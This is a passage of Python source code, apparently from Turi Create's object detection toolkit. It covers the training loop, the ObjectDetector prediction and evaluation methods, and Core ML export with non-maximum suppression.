# no thread hogs the global interpreter lock).
mxnet_batch_queue = _Queue(1)
numpy_batch_queue = _Queue(1)
def sframe_worker():
# Once a batch is loaded into NumPy, pass it immediately to the
# numpy_worker so that we can start I/O and decoding for the next
# batch.
for batch in loader:
mxnet_batch_queue.put(batch)
mxnet_batch_queue.put(None)
def numpy_worker():
while True:
batch = mxnet_batch_queue.get()
if batch is None:
break
for x, y in zip(batch.data, batch.label):
# Convert to NumPy arrays with required shapes. Note that
# asnumpy waits for any pending MXNet operations to finish.
input_data = _mxnet_to_mps(x.asnumpy())
label_data = y.asnumpy().reshape(y.shape[:-2] + (-1,))
# Convert to packed 32-bit arrays.
input_data = input_data.astype(_np.float32)
if not input_data.flags.c_contiguous:
input_data = input_data.copy()
label_data = label_data.astype(_np.float32)
if not label_data.flags.c_contiguous:
label_data = label_data.copy()
# Push this batch to the main thread.
numpy_batch_queue.put({'input' : input_data,
'label' : label_data,
'iteration' : batch.iteration})
# Tell the main thread there's no more data.
numpy_batch_queue.put(None)
sframe_worker_thread = _Thread(target=sframe_worker)
sframe_worker_thread.start()
numpy_worker_thread = _Thread(target=numpy_worker)
numpy_worker_thread.start()
batches_started = 0
batches_finished = 0
while True:
batch = numpy_batch_queue.get()
if batch is None:
break
# Adjust learning rate according to our schedule.
if batch['iteration'] in steps:
ii = steps.index(batch['iteration']) + 1
new_lr = factors[ii] * base_lr
mps_net.set_learning_rate(new_lr / mps_loss_mult)
            # Submit this batch to MPS.
mps_net.start_batch(batch['input'], label=batch['label'])
batches_started += 1
# If we have two batches in flight, wait for the first one.
if batches_started - batches_finished > 1:
batches_finished += 1
cur_loss = mps_net.wait_for_batch().sum() / mps_loss_mult
# If we just submitted the first batch of an iteration, update
# progress for the iteration completed by the last batch we just
# waited for.
if batch['iteration'] > iteration:
update_progress(cur_loss, iteration)
iteration = batch['iteration']
# Wait for any pending batches and finalize our progress updates.
while batches_finished < batches_started:
batches_finished += 1
cur_loss = mps_net.wait_for_batch().sum() / mps_loss_mult
update_progress(cur_loss, iteration)
sframe_worker_thread.join()
numpy_worker_thread.join()
# Load back into mxnet
mps_net_params = mps_net.export()
keys = mps_net_params.keys()
for k in keys:
if k in net_params:
net_params[k].set_data(_mps_to_mxnet(mps_net_params[k]))
else: # Use MxNet
options = {'learning_rate': base_lr, 'lr_scheduler': lr_scheduler,
'momentum': params['sgd_momentum'], 'wd': params['weight_decay'], 'rescale_grad': 1.0}
clip_grad = params.get('clip_gradients')
if clip_grad:
options['clip_gradient'] = clip_grad
trainer = _mx.gluon.Trainer(net.collect_params(), 'sgd', options)
for batch in loader:
data = _mx.gluon.utils.split_and_load(batch.data[0], ctx_list=ctx, batch_axis=0)
label = _mx.gluon.utils.split_and_load(batch.label[0], ctx_list=ctx, batch_axis=0)
Ls = []
Zs = []
with _mx.autograd.record():
for x, y in zip(data, label):
z = net(x)
z0 = _mx.nd.transpose(z, [0, 2, 3, 1]).reshape(ymap_shape)
L = loss(z0, y)
Ls.append(L)
for L in Ls:
L.backward()
trainer.step(1)
cur_loss = _np.mean([L.asnumpy()[0] for L in Ls])
update_progress(cur_loss, batch.iteration)
iteration = batch.iteration
training_time = _time.time() - start_time
if verbose:
print(hr) # progress table footer
# Save the model
training_iterations = iteration + 1
state = {
'_model': net,
'_class_to_index': class_to_index,
'_training_time_as_string': _seconds_as_string(training_time),
'_grid_shape': grid_shape,
'anchors': anchors,
'model': model,
'classes': classes,
'batch_size': batch_size,
'input_image_shape': input_image_shape,
'feature': feature,
'non_maximum_suppression_threshold': params['non_maximum_suppression_threshold'],
'annotations': annotations,
'num_classes': num_classes,
'num_examples': num_images,
'num_bounding_boxes': num_instances,
'training_time': training_time,
'training_epochs': training_iterations * batch_size // num_images,
'training_iterations': training_iterations,
'max_iterations': max_iterations,
'training_loss': progress['smoothed_loss'],
}
return ObjectDetector(state)
class ObjectDetector(_CustomModel):
"""
    A trained model that is ready to use for classification, exported to
Core ML, or for feature extraction.
This model should not be constructed directly.
"""
_PYTHON_OBJECT_DETECTOR_VERSION = 1
def __init__(self, state):
self.__proxy__ = _PythonProxy(state)
@classmethod
def _native_name(cls):
return "object_detector"
def _get_native_state(self):
state = self.__proxy__.get_state()
mxnet_params = state['_model'].collect_params()
state['_model'] = _mxnet_utils.get_gluon_net_params_state(mxnet_params)
return state
def _get_version(self):
return self._PYTHON_OBJECT_DETECTOR_VERSION
@classmethod
def _load_version(cls, state, version):
_tkutl._model_version_check(version, cls._PYTHON_OBJECT_DETECTOR_VERSION)
from ._model import tiny_darknet as _tiny_darknet
num_anchors = len(state['anchors'])
num_classes = state['num_classes']
output_size = (num_classes + 5) * num_anchors
net = _tiny_darknet(output_size=output_size)
ctx = _mxnet_utils.get_mxnet_context(max_devices=state['batch_size'])
net_params = net.collect_params()
_mxnet_utils.load_net_params_from_state(net_params, state['_model'], ctx=ctx)
state['_model'] = net
state['input_image_shape'] = tuple([int(i) for i in state['input_image_shape']])
state['_grid_shape'] = tuple([int(i) for i in state['_grid_shape']])
return ObjectDetector(state)
def __str__(self):
"""
Return a string description of the model to the ``print`` method.
Returns
-------
out : string
A description of the ObjectDetector.
"""
return self.__repr__()
def __repr__(self):
"""
Print a string description of the model when the model name is entered
in the terminal.
"""
width = 40
sections, section_titles = self._get_summary_struct()
out = _tkutl._toolkit_repr_print(self, sections, section_titles,
width=width)
return out
def _get_summary_struct(self):
"""
Returns a structured description of the model, including (where
relevant) the schema of the training data, description of the training
data, training statistics, and model hyperparameters.
Returns
-------
sections : list (of list of tuples)
A list of summary sections.
Each section is a list.
Each item in a section list is a tuple of the form:
('<label>','<field>')
section_titles: list
A list of section titles.
The order matches that of the 'sections' object.
"""
model_fields = [
('Model', 'model'),
('Number of classes', 'num_classes'),
('Non-maximum suppression threshold', 'non_maximum_suppression_threshold'),
('Input image shape', 'input_image_shape'),
]
training_fields = [
('Training time', '_training_time_as_string'),
('Training epochs', 'training_epochs'),
('Training iterations', 'training_iterations'),
('Number of examples (images)', 'num_examples'),
('Number of bounding boxes (instances)', 'num_bounding_boxes'),
('Final loss (specific to model)', 'training_loss'),
]
section_titles = ['Schema', 'Training summary']
return([model_fields, training_fields], section_titles)
def _predict_with_options(self, dataset, with_ground_truth,
postprocess=True, confidence_threshold=0.001,
verbose=True):
"""
Predict with options for what kind of SFrame should be returned.
If postprocess is False, a single numpy array with raw unprocessed
results will be returned.
"""
_raise_error_if_not_detection_sframe(dataset, self.feature, self.annotations,
require_annotations=with_ground_truth)
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._detection import (yolo_map_to_bounding_boxes as _yolo_map_to_bounding_boxes,
non_maximum_suppression as _non_maximum_suppression,
bbox_to_ybox as _bbox_to_ybox)
import mxnet as _mx
loader = _SFrameDetectionIter(dataset,
batch_size=self.batch_size,
input_shape=self.input_image_shape[1:],
output_shape=self._grid_shape,
anchors=self.anchors,
class_to_index=self._class_to_index,
loader_type='stretched',
load_labels=with_ground_truth,
shuffle=False,
epochs=1,
feature_column=self.feature,
annotations_column=self.annotations)
num_anchors = len(self.anchors)
preds_per_box = 5 + len(self.classes)
output_size = preds_per_box * num_anchors
# If prediction is done with ground truth, two sframes of the same
# structure are returned, the second one containing ground truth labels
num_returns = 2 if with_ground_truth else 1
sf_builders = [
_tc.SFrameBuilder([int, str, float, float, float, float, float],
column_names=['row_id', 'label', 'confidence',
'x', 'y', 'width', 'height'])
for _ in range(num_returns)
]
num_mxnet_gpus = _mxnet_utils.get_num_gpus_in_use(max_devices=self.batch_size)
use_mps = _use_mps() and num_mxnet_gpus == 0
if use_mps:
if not hasattr(self, '_mps_inference_net') or self._mps_inference_net is None:
mps_net_params = _mxnet_network_to_mps_params(self._model.collect_params())
mps_config = {
'mode': _MpsGraphMode.Inference,
'od_include_network': True,
'od_include_loss': False,
}
mps_net = _get_mps_od_net(input_image_shape=self.input_image_shape,
batch_size=self.batch_size,
output_size=output_size,
anchors=self.anchors,
config=mps_config,
weights=mps_net_params)
self._mps_inference_net = mps_net
dataset_size = len(dataset)
ctx = _mxnet_utils.get_mxnet_context()
done = False
last_time = 0
raw_results = []
for batch in loader:
if batch.pad is not None:
size = self.batch_size - batch.pad
b_data = _mx.nd.slice_axis(batch.data[0], axis=0, begin=0, end=size)
b_indices = _mx.nd.slice_axis(batch.label[1], axis=0, begin=0, end=size)
b_oshapes = _mx.nd.slice_axis(batch.label[2], axis=0, begin=0, end=size)
else:
b_data = batch.data[0]
b_indices = batch.label[1]
b_oshapes = batch.label[2]
size = self.batch_size
if b_data.shape[0] < len(ctx):
ctx0 = ctx[:b_data.shape[0]]
else:
ctx0 = ctx
split_data = _mx.gluon.utils.split_and_load(b_data, ctx_list=ctx0, even_split=False)
split_indices = _mx.gluon.utils.split_data(b_indices, num_slice=len(ctx0), even_split=False)
split_oshapes = _mx.gluon.utils.split_data(b_oshapes, num_slice=len(ctx0), even_split=False)
for data, indices, oshapes in zip(split_data, split_indices, split_oshapes):
if use_mps:
mps_data = _mxnet_to_mps(data.asnumpy())
n_samples = mps_data.shape[0]
if mps_data.shape[0] != self.batch_size:
mps_data_padded = _np.zeros((self.batch_size,) + mps_data.shape[1:],
dtype=mps_data.dtype)
mps_data_padded[:mps_data.shape[0]] = mps_data
mps_data = mps_data_padded
self._mps_inference_net.start_batch(mps_data)
mps_z = self._mps_inference_net.wait_for_batch()[:n_samples]
z = _mps_to_mxnet(mps_z)
else:
z = self._model(data).asnumpy()
if not postprocess:
raw_results.append(z)
continue
ypred = z.transpose(0, 2, 3, 1)
ypred = ypred.reshape(ypred.shape[:-1] + (num_anchors, -1))
zipped = zip(indices.asnumpy(), ypred, oshapes.asnumpy())
for index0, output0, oshape0 in zipped:
index0 = int(index0)
x_boxes, x_classes, x_scores = _yolo_map_to_bounding_boxes(
output0[_np.newaxis], anchors=self.anchors,
confidence_threshold=confidence_threshold,
nms_thresh=None)
x_boxes0 = _np.array(x_boxes).reshape(-1, 4)
# Normalize
x_boxes0[:, 0::2] /= self.input_image_shape[1]
x_boxes0[:, 1::2] /= self.input_image_shape[2]
# Re-shape to original input size
x_boxes0[:, 0::2] *= oshape0[0]
x_boxes0[:, 1::2] *= oshape0[1]
# Clip the boxes to the original sizes
x_boxes0[:, 0::2] = _np.clip(x_boxes0[:, 0::2], 0, oshape0[0])
x_boxes0[:, 1::2] = _np.clip(x_boxes0[:, 1::2], 0, oshape0[1])
                # Non-maximum suppression (also limit to 100 detections per
# image, inspired by the evaluation in COCO)
x_boxes0, x_classes, x_scores = _non_maximum_suppression(
x_boxes0, x_classes, x_scores,
num_classes=self.num_classes, threshold=self.non_maximum_suppression_threshold,
limit=100)
for bbox, cls, s in zip(x_boxes0, x_classes, x_scores):
cls = int(cls)
values = [index0, self.classes[cls], s] + list(_bbox_to_ybox(bbox))
sf_builders[0].append(values)
if index0 == len(dataset) - 1:
done = True
cur_time = _time.time()
                # Do not print progress if only a few samples are predicted
if verbose and (dataset_size >= 5 and cur_time > last_time + 10 or done):
print('Predicting {cur_n:{width}d}/{max_n:{width}d}'.format(
cur_n=index0 + 1, max_n=dataset_size, width=len(str(dataset_size))))
last_time = cur_time
if done:
break
# Ground truth
if with_ground_truth:
zipped = _itertools.islice(zip(batch.label[1].asnumpy(), batch.raw_bboxes, batch.raw_classes), size)
for index0, bbox0, cls0 in zipped:
index0 = int(index0)
for bbox, cls in zip(bbox0, cls0):
cls = int(cls)
if cls == -1:
break
values = [index0, self.classes[cls], 1.0] + list(bbox)
sf_builders[1].append(values)
if index0 == len(dataset) - 1:
break
if postprocess:
ret = tuple([sb.close() for sb in sf_builders])
if len(ret) == 1:
return ret[0]
else:
return ret
else:
return _np.concatenate(raw_results, axis=0)
def _raw_predict(self, dataset):
return self._predict_with_options(dataset, with_ground_truth=False,
postprocess=False)
def predict(self, dataset, confidence_threshold=0.25, verbose=True):
"""
Predict object instances in an sframe of images.
Parameters
----------
dataset : SFrame
A dataset that has the same columns that were used during training.
If the annotations column exists in ``dataset`` it will be ignored
while making predictions.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
verbose : bool
If True, prints prediction progress.
Returns
-------
out : SArray
An SArray with model predictions. Each element corresponds to
an image and contains a list of dictionaries. Each dictionary
            describes an object instance that was found in the image.
See Also
--------
evaluate
Examples
--------
.. sourcecode:: python
# Make predictions
>>> pred = model.predict(data)
# Stack predictions, for a better overview
>>> turicreate.object_detector.util.stack_annotations(pred)
Data:
+--------+------------+-------+-------+-------+-------+--------+
| row_id | confidence | label | x | y | width | height |
+--------+------------+-------+-------+-------+-------+--------+
| 0 | 0.98 | dog | 123.0 | 128.0 | 80.0 | 182.0 |
| 0 | 0.67 | cat | 150.0 | 183.0 | 129.0 | 101.0 |
| 1 | 0.8 | dog | 50.0 | 432.0 | 65.0 | 98.0 |
+--------+------------+-------+-------+-------+-------+--------+
[3 rows x 7 columns]
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_numeric_param_check_range('confidence_threshold', confidence_threshold, 0.0, 1.0)
stacked_pred = self._predict_with_options(dataset, with_ground_truth=False,
confidence_threshold=confidence_threshold,
verbose=verbose)
from . import util
return util.unstack_annotations(stacked_pred, num_rows=len(dataset))
def evaluate(self, dataset, metric='auto', output_type='dict', verbose=True):
"""
Evaluate the model by making predictions and comparing these to ground
truth bounding box annotations.
Parameters
----------
dataset : SFrame
Dataset of new observations. Must include columns with the same
names as the annotations and feature used for model training.
Additional columns are ignored.
metric : str or list, optional
Name of the evaluation metric or list of several names. The primary
metric is average precision, which is the area under the
precision/recall curve and reported as a value between 0 and 1 (1
being perfect). Possible values are:
- 'auto' : Returns all primary metrics.
- 'all' : Returns all available metrics.
- 'average_precision_50' : Average precision per class with
intersection-over-union threshold at
50% (PASCAL VOC metric).
- 'average_precision' : Average precision per class calculated over multiple
intersection-over-union thresholds
(at 50%, 55%, ..., 95%) and averaged.
- 'mean_average_precision_50' : Mean over all classes (for ``'average_precision_50'``).
This is the primary single-value metric.
- 'mean_average_precision' : Mean over all classes (for ``'average_precision'``)
output_type : str
Type of output:
- 'dict' : You are given a dictionary where each key is a metric name and the
value is another dictionary containing class-to-metric entries.
- 'sframe' : All metrics are returned as a single `SFrame`, where each row is a
class and each column is a metric. Metrics that are averaged over
class cannot be returned and are ignored under this format.
However, these are easily computed from the `SFrame` (e.g.
``results['average_precision'].mean()``).
verbose : bool
If True, prints evaluation progress.
Returns
-------
out : dict / SFrame
Output type depends on the option `output_type`.
See Also
--------
create, predict
Examples
--------
>>> results = model.evaluate(data)
>>> print('mAP: {:.1%}'.format(results['mean_average_precision']))
mAP: 43.2%
"""
AP = 'average_precision'
MAP = 'mean_average_precision'
AP50 = 'average_precision_50'
MAP50 = 'mean_average_precision_50'
ALL_METRICS = {AP, MAP, AP50, MAP50}
if isinstance(metric, (list, tuple, set)):
metrics = metric
elif metric == 'all':
metrics = ALL_METRICS
elif metric == 'auto':
metrics = {AP50, MAP50}
elif metric in ALL_METRICS:
metrics = {metric}
else:
raise _ToolkitError("Metric '{}' not supported".format(metric))
pred, gt = self._predict_with_options(dataset, with_ground_truth=True,
verbose=verbose)
pred_df = pred.to_dataframe()
gt_df = gt.to_dataframe()
thresholds = _np.arange(0.5, 1.0, 0.05)
all_th_aps = _average_precision(pred_df, gt_df,
class_to_index=self._class_to_index,
iou_thresholds=thresholds)
def class_dict(aps):
return {classname: aps[index]
for classname, index in self._class_to_index.items()}
if output_type == 'dict':
ret = {}
if AP50 in metrics:
ret[AP50] = class_dict(all_th_aps[0])
if AP in metrics:
ret[AP] = class_dict(all_th_aps.mean(0))
if MAP50 in metrics:
ret[MAP50] = all_th_aps[0].mean()
if MAP in metrics:
ret[MAP] = all_th_aps.mean()
elif output_type == 'sframe':
ret = _tc.SFrame({'label': self.classes})
if AP50 in metrics:
ret[AP50] = all_th_aps[0]
if AP in metrics:
ret[AP] = all_th_aps.mean(0)
else:
raise _ToolkitError("Output type '{}' not supported".format(output_type))
return ret
def export_coreml(self, filename,
include_non_maximum_suppression = True,
iou_threshold = None,
confidence_threshold = None):
"""
Save the model in Core ML format. The Core ML model takes an image of
fixed size as input and produces two output arrays: `confidence` and
`coordinates`.
The first one, `confidence` is an `N`-by-`C` array, where `N` is the
number of instances predicted and `C` is the number of classes. The
number `N` is fixed and will include many low-confidence predictions.
The instances are not sorted by confidence, so the first one will
generally not have the highest confidence (unlike in `predict`). Also
unlike the `predict` function, the instances have not undergone
what is called `non-maximum suppression`, which means there could be
several instances close in location and size that have all discovered
the same object instance. Confidences do not need to sum to 1 over the
classes; any remaining probability is implied as the confidence that no
object instance is present at all at the given coordinates. The classes
appear in the array sorted alphabetically.
The second array `coordinates` is of size `N`-by-4, where the first
dimension `N` again represents instances and corresponds to the
`confidence` array. The second dimension represents `x`, `y`, `width`,
`height`, in that order. The values are represented in relative
coordinates, so (0.5, 0.5) represents the center of the image and (1,
1) the bottom right corner. To get pixel coordinates similar to
`predict`, multiply the relative values by the size of the original
image (before it was resized to the fixed input size).
See Also
--------
save
Parameters
----------
filename : string
The path of the file where we want to save the Core ML model.
include_non_maximum_suppression : bool
Whether the Core ML model should be saved with built-in non-maximum
suppression. Non-maximum suppression is only available in iOS 12+.
This parameter is set to True by default.
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
suppression is. A value of 1 means no suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
Examples
--------
>>> model.export_coreml('detector.mlmodel')
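As a sketch of post-processing the exported model's output, relative
coordinates can be mapped back to pixels (image size values here are
illustrative):
>>> orig_width, orig_height = 1280, 720  # original image size (illustrative)
>>> x, y, w, h = 0.5, 0.5, 0.25, 0.25    # one row of `coordinates`
>>> pixel_box = [x * orig_width, y * orig_height,
...              w * orig_width, h * orig_height]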
"""
import mxnet as _mx
from .._mxnet_to_coreml import _mxnet_converter
import coremltools
from coremltools.models import datatypes, neural_network
if not iou_threshold: iou_threshold = self.non_maximum_suppression_threshold
if not confidence_threshold: confidence_threshold = 0.25
preds_per_box = 5 + self.num_classes
num_anchors = len(self.anchors)
num_classes = self.num_classes
batch_size = 1
image_shape = (batch_size,) + tuple(self.input_image_shape)
s_image_uint8 = _mx.sym.Variable(self.feature, shape=image_shape, dtype=_np.float32)
s_image = s_image_uint8 / 255
# Swap a maxpool+slice in mxnet to a coreml natively supported layer
from copy import copy
net = copy(self._model)
net._children = copy(self._model._children)
from ._model import _SpecialDarknetMaxpoolBlock
op = _SpecialDarknetMaxpoolBlock(name='pool5')
# Make sure we are removing the right layers
assert (self._model[23].name == 'pool5' and
self._model[24].name == 'specialcrop5')
del net._children[24]
net._children[23] = op
s_ymap = net(s_image)
mod = _mx.mod.Module(symbol=s_ymap, label_names=None, data_names=[self.feature])
mod.bind(for_training=False, data_shapes=[(self.feature, image_shape)])
# Copy over params from net
mod.init_params()
arg_params, aux_params = mod.get_params()
net_params = net.collect_params()
new_arg_params = {}
for k, param in arg_params.items():
new_arg_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
new_aux_params = {}
for k, param in aux_params.items():
new_aux_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
mod.set_params(new_arg_params, new_aux_params)
input_names = [self.feature]
input_dims = [list(self.input_image_shape)]
input_types = [datatypes.Array(*dim) for dim in input_dims]
input_features = list(zip(input_names, input_types))
num_spatial = self._grid_shape[0] * self._grid_shape[1]
num_bounding_boxes = num_anchors * num_spatial
CONFIDENCE_STR = ("raw_confidence" if include_non_maximum_suppression
else "confidence")
COORDINATES_STR = ("raw_coordinates" if include_non_maximum_suppression
else "coordinates")
output_names = [
CONFIDENCE_STR,
COORDINATES_STR
]
output_dims = [
(num_bounding_boxes, num_classes),
(num_bounding_boxes, 4),
]
output_types = [datatypes.Array(*dim) for dim in output_dims]
output_features = list(zip(output_names, output_types))
mode = None
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, mode)
_mxnet_converter.convert(mod, mode=None,
input_shape=[(self.feature, image_shape)],
builder=builder, verbose=False)
prefix = '__tc__internal__'
# (1, B, C+5, S*S)
builder.add_reshape(name=prefix + 'ymap_sp_pre',
target_shape=[batch_size, num_anchors, preds_per_box, num_spatial],
mode=0,
input_name='conv8_fwd_output',
output_name=prefix + 'ymap_sp_pre')
# (1, C+5, B, S*S)
builder.add_permute(name=prefix + 'ymap_sp',
dim=[0, 2, 1, 3],
input_name=prefix + 'ymap_sp_pre',
output_name=prefix + 'ymap_sp')
# POSITION: X/Y
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_xy_sp',
axis='channel',
start_index=0,
end_index=2,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_xy_sp')
# (1, 2, B, S*S)
builder.add_activation(name=prefix + 'rel_xy_sp',
non_linearity='SIGMOID',
input_name=prefix + 'raw_rel_xy_sp',
output_name=prefix + 'rel_xy_sp')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'rel_xy',
target_shape=[batch_size, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'rel_xy_sp',
output_name=prefix + 'rel_xy')
c_xy = _np.array(_np.meshgrid(_np.arange(self._grid_shape[1]),
_np.arange(self._grid_shape[0])), dtype=_np.float32)
c_xy_reshaped = (_np.tile(c_xy[:, _np.newaxis], (num_anchors, 1, 1))
.reshape(2, -1))[_np.newaxis, ..., _np.newaxis]
# (1, 2, B*H*W, 1)
builder.add_load_constant(prefix + 'constant_xy',
constant_value=c_xy_reshaped,
shape=c_xy_reshaped.shape[1:],
output_name=prefix + 'constant_xy')
# (1, 2, B*H*W, 1)
builder.add_elementwise(name=prefix + 'xy',
mode='ADD',
input_names=[prefix + 'constant_xy', prefix + 'rel_xy'],
output_name=prefix + 'xy')
# SHAPE: WIDTH/HEIGHT
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_wh_sp',
axis='channel',
start_index=2,
end_index=4,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_wh_sp')
# (1, 2, B, S*S)
builder.add_unary(name=prefix + 'rel_wh_sp',
mode='exp',
input_name=prefix + 'raw_rel_wh_sp',
output_name=prefix + 'rel_wh_sp')
# (1, 2*B, S, S)
builder.add_reshape(name=prefix + 'rel_wh',
target_shape=[batch_size, 2 * num_anchors] + list(self._grid_shape),
mode=0,
input_name=prefix + 'rel_wh_sp',
output_name=prefix + 'rel_wh')
np_anchors = _np.asarray(self.anchors, dtype=_np.float32).T
anchors_0 = _np.tile(np_anchors.reshape([2 * num_anchors, 1, 1]), self._grid_shape)
# (1, 2*B, S, S)
builder.add_load_constant(name=prefix + 'c_anchors',
constant_value=anchors_0,
shape=anchors_0.shape,
output_name=prefix + 'c_anchors')
# (1, 2*B, S, S)
builder.add_elementwise(name=prefix + 'wh_pre',
mode='MULTIPLY',
input_names=[prefix + 'c_anchors', prefix + 'rel_wh'],
output_name=prefix + 'wh_pre')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'wh',
target_shape=[1, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'wh_pre',
output_name=prefix + 'wh')
# (1, 4, B*H*W, 1)
builder.add_elementwise(name=prefix + 'boxes_out_transposed',
mode='CONCAT',
input_names=[prefix + 'xy', prefix + 'wh'],
output_name=prefix + 'boxes_out_transposed')
# (1, B*H*W, 4, 1)
builder.add_permute(name=prefix + 'boxes_out',
dim=[0, 2, 1, 3],
input_name=prefix + 'boxes_out_transposed',
output_name=prefix + 'boxes_out')
scale = _np.zeros((num_bounding_boxes, 4, 1))
scale[:, 0::2] = 1.0 / self._grid_shape[1]
scale[:, 1::2] = 1.0 / self._grid_shape[0]
# (1, B*H*W, 4, 1)
builder.add_scale(name=COORDINATES_STR,
W=scale,
b=0,
has_bias=False,
shape_scale=(num_bounding_boxes, 4, 1),
input_name=prefix + 'boxes_out',
output_name=COORDINATES_STR)
# CLASS PROBABILITIES AND OBJECT CONFIDENCE
# (1, C, B, H*W)
builder.add_slice(name=prefix + 'scores_sp',
axis='channel',
start_index=5,
end_index=preds_per_box,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'scores_sp')
# (1, C, B, H*W)
builder.add_softmax(name=prefix + 'probs_sp',
input_name=prefix + 'scores_sp',
output_name=prefix + 'probs_sp')
# (1, 1, B, H*W)
builder.add_slice(name=prefix + 'logit_conf_sp',
axis='channel',
start_index=4,
end_index=5,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'logit_conf_sp')
# (1, 1, B, H*W)
builder.add_activation(name=prefix + 'conf_sp',
non_linearity='SIGMOID',
input_name=prefix + 'logit_conf_sp',
output_name=prefix + 'conf_sp')
# (1, C, B, H*W)
if num_classes > 1:
conf = prefix + 'conf_tiled_sp'
builder.add_elementwise(name=prefix + 'conf_tiled_sp',
mode='CONCAT',
input_names=[prefix+'conf_sp']*num_classes,
output_name=conf)
else:
conf = prefix + 'conf_sp'
# (1, C, B, H*W)
builder.add_elementwise(name=prefix + 'confprobs_sp',
mode='MULTIPLY',
input_names=[conf, prefix + 'probs_sp'],
output_name=prefix + 'confprobs_sp')
# (1, C, B*H*W, 1)
builder.add_reshape(name=prefix + 'confprobs_transposed',
target_shape=[1, num_classes, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'confprobs_sp',
output_name=prefix + 'confprobs_transposed')
# (1, B*H*W, C, 1)
builder.add_permute(name=CONFIDENCE_STR,
dim=[0, 2, 1, 3],
input_name=prefix + 'confprobs_transposed',
output_name=CONFIDENCE_STR)
_mxnet_converter._set_input_output_layers(
builder, input_names, output_names)
builder.set_input(input_names, input_dims)
builder.set_output(output_names, output_dims)
builder.set_pre_processing_parameters(image_input_names=self.feature)
model = builder.spec
if include_non_maximum_suppression:
# Non-Maximum Suppression is a post-processing algorithm
# responsible for merging all detections that belong to the
# same object.
# Core ML schematic
# +------------------------------------+
# | Pipeline |
# | |
# | +------------+ +-------------+ |
# | | Neural | | Non-maximum | |
# | | network +---> suppression +-----> confidences
# Image +----> | | | |
# | | +---> +-----> coordinates
# | | | | | |
# Optional inputs: | +------------+ +-^---^-------+ |
# | | | |
# IOU threshold +-----------------------+ | |
# | | |
# Confidence threshold +---------------------------+ |
# +------------------------------------+
model_neural_network = model.neuralNetwork
model.specificationVersion = 3
model.pipeline.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[0].neuralNetwork.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[1].nonMaximumSuppression.ParseFromString(b'')
# begin: Neural network model
nn_model = model.pipeline.models[0]
nn_model.description.ParseFromString(b'')
input_image = model.description.input[0]
input_image.type.imageType.width = self.input_image_shape[1]
input_image.type.imageType.height = self.input_image_shape[2]
nn_model.description.input.add()
nn_model.description.input[0].ParseFromString(
input_image.SerializeToString())
for i in range(2):
del model.description.output[i].type.multiArrayType.shape[:]
names = ["raw_confidence", "raw_coordinates"]
bounds = [self.num_classes, 4]
for i in range(2):
output_i = model.description.output[i]
output_i.name = names[i]
for j in range(2):
ma_type = output_i.type.multiArrayType
ma_type.shapeRange.sizeRanges.add()
ma_type.shapeRange.sizeRanges[j].lowerBound = (
bounds[i] if j == 1 else 0)
ma_type.shapeRange.sizeRanges[j].upperBound = (
bounds[i] if j == 1 else -1)
nn_model.description.output.add()
nn_model.description.output[i].ParseFromString(
output_i.SerializeToString())
ma_type = nn_model.description.output[i].type.multiArrayType
ma_type.shape.append(num_bounding_boxes)
ma_type.shape.append(bounds[i])
# Think more about this line
nn_model.neuralNetwork.ParseFromString(
model_neural_network.SerializeToString())
nn_model.specificationVersion = model.specificationVersion
# end: Neural network model
# begin: Non maximum suppression model
nms_model = model.pipeline.models[1]
nms_model_nonMaxSup = nms_model.nonMaximumSuppression
for i in range(2):
output_i = model.description.output[i]
nms_model.description.input.add()
nms_model.description.input[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output.add()
nms_model.description.output[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output[i].name = (
'confidence' if i==0 else 'coordinates')
nms_model_nonMaxSup.iouThreshold = iou_threshold
nms_model_nonMaxSup.confidenceThreshold = confidence_threshold
nms_model_nonMaxSup.confidenceInputFeatureName = 'raw_confidence'
nms_model_nonMaxSup.coordinatesInputFeatureName = 'raw_coordinates'
nms_model_nonMaxSup.confidenceOutputFeatureName = 'confidence'
nms_model_nonMaxSup.coordinatesOutputFeatureName = 'coordinates'
nms_model.specificationVersion = model.specificationVersion
nms_model_nonMaxSup.stringClassLabels.vector.extend(self.classes)
for i in range(2):
nms_model.description.input[i].ParseFromString(
nn_model.description.output[i].SerializeToString()
)
if include_non_maximum_suppression:
# Iou Threshold
IOU_THRESHOLD_STRING = 'iouThreshold'
model.description.input.add()
model.description.input[1].type.doubleType.ParseFromString(b'')
model.description.input[1].name = IOU_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[2].ParseFromString(
model.description.input[1].SerializeToString()
)
nms_model_nonMaxSup.iouThresholdInputFeatureName = IOU_THRESHOLD_STRING
# Confidence Threshold
CONFIDENCE_THRESHOLD_STRING = 'confidenceThreshold'
model.description.input.add()
model.description.input[2].type.doubleType.ParseFromString(b'')
model.description.input[2].name = CONFIDENCE_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[3].ParseFromString(
model.description.input[2].SerializeToString())
nms_model_nonMaxSup.confidenceThresholdInputFeatureName = \
CONFIDENCE_THRESHOLD_STRING
